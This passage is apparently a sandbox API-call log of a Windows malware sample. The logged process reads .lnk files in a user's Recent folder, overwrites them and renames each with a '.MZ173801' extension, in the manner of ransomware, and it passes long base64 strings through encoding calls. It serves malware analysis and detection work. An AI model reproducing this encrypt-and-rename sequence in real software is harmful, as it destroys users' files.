lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.396] GetCurrentThreadId () returned 0x1358 [0108.396] GetCurrentThreadId () returned 0x1358 [0108.396] GetCurrentThreadId () returned 0x1358 [0108.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fYWa4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fywa4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.397] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.397] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.397] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4a7 [0108.397] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.397] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4a7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4a7, lpOverlapped=0x0) returned 1 [0108.398] CloseHandle (hObject=0x3f4) returned 1 [0108.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fYWa4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fywa4.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.399] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x4a7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4a7, lpOverlapped=0x0) returned 1 [0108.400] CloseHandle (hObject=0x3f4) returned 1 [0108.401] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fYWa4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fywa4.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fYWa4.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\fywa4.lnk.mz173801")) returned 1 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] GetCurrentThreadId () returned 0x1358 [0108.402] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1569fd, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1569fd, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec1569fd, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="g2GKlHNibJE_MvHnw.lnk", cAlternateFileName="G2GKLH~1.LNK")) returned 1 [0108.402] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.402] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\g2GKlHNibJE_MvHnw.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g2gklhnibje_mvhnw.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1569fd, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1569fd, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec1569fd, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3fe)) returned 1 [0108.403] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.403] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.403] GetCurrentThreadId () returned 0x1358 [0108.403] GetCurrentThreadId () returned 0x1358 [0108.403] GetCurrentThreadId () returned 0x1358 [0108.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.404] GetCurrentThreadId () returned 0x1358 [0108.404] GetCurrentThreadId () returned 0x1358 [0108.405] GetCurrentThreadId () returned 0x1358 [0108.405] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\g2GKlHNibJE_MvHnw.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g2gklhnibje_mvhnw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.405] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.405] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.405] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3fe [0108.405] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.405] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3fe, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3fe, lpOverlapped=0x0) returned 1 [0108.406] CloseHandle (hObject=0x3f4) returned 1 [0108.406] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\g2GKlHNibJE_MvHnw.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g2gklhnibje_mvhnw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.407] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3fe, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3fe, lpOverlapped=0x0) returned 1 [0108.408] CloseHandle (hObject=0x3f4) returned 1 [0109.161] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\g2GKlHNibJE_MvHnw.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g2gklhnibje_mvhnw.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\g2GKlHNibJE_MvHnw.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g2gklhnibje_mvhnw.lnk.mz173801")) returned 1 [0109.161] GetCurrentThreadId () returned 0x1358 [0109.161] GetCurrentThreadId () returned 0x1358 [0109.162] GetCurrentThreadId () returned 0x1358 [0109.162] GetCurrentThreadId () returned 0x1358 [0109.162] GetCurrentThreadId () returned 0x1358 [0109.162] GetCurrentThreadId () returned 0x1358 [0109.162] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea14d06b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea14d06b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea14d06b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="G5n4vH.lnk", cAlternateFileName="")) returned 1 [0109.162] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.162] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G5n4vH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g5n4vh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea14d06b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea14d06b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea14d06b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3c5)) returned 1 [0109.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 